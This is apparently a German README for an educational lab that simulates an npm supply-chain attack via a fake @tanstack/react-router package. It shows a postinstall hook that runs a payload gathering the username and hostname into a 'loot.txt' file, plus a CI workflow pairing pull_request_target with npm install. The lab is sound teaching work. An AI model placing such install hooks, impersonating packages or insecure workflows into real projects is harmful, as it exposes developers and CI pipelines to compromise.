
Pädagogisches Labor, das npm-Supply-Chain-Angriffe, CI/CD-Missbrauch und Codeausführung zur Installationszeit über CVE-2026-45321 simuliert. Praktische defensive Sicherheitsforschung zum Verständnis von Abhängigkeitskompromittierung und Ausnutzung von Lifecycle-Hooks.
Bildungslabor zum Verständnis von npm-Supply-Chain-Angriffen, CI/CD-Missbrauch und Installationszeit-Codeausführung
Dieses Projekt wurde ausschließlich erstellt für:
Verwenden Sie dieses Projekt nicht für:
Dieses Labor simuliert die grundlegenden Konzepte der Vorfälle:
Die Simulation erfolgt lokal und sicher ohne:
lab/
├── fake-repo/ # Simulation des Ziel-Repositorys
├── attacker-package/ # Simulation des bösartigen Pakets
└── victim-project/ # Simulation des Opfers
Attacker Package
↓
npm install
↓
postinstall-Skript wird ausgeführt
↓
payload.js wird automatisch ausgeführt
↓
Opfer wird von Installationszeit-Ausführung getroffen
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git
cd CVE-2026-45321-Tanstack
cd attacker-package
npm install
npm pack
Ergebnis:
tanstack-react-router-1.169.5.tgz
cd ../victim-project
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts
Bei Erfolg erscheint:
=== MALICIOUS PAYLOAD EXECUTED ===
und die Datei:
loot.txt
wird automatisch erstellt.
const os = require('os');
const fs = require('fs');
console.log("=== MALICIOUS PAYLOAD EXECUTED ===");
const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;
console.log(info);
fs.writeFileSync("loot.txt", info);
{
"name": "@tanstack/react-router",
"version": "1.169.5",
"scripts": {
"postinstall": "node payload.js"
}
}
Dieses Projekt kann auch zum Verständnis von Folgendem verwendet werden:
Beispiel-Workflow:
name: CI
on:
pull_request_target:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- run: npm install
| Lab-Simulation | Reale Welt |
|---|---|
| attacker-package | Kompromittiertes TanStack-Paket |
| payload.js | Bösartiger Installer |
| postinstall | Missbrauch von Lifecycle-Hooks |
| victim-project | Entwickler/CI-Opfer |
| fake-repo | GitHub Actions-Pipeline |
Dieses Labor wurde erstellt, um das Bewusstsein zu schärfen für: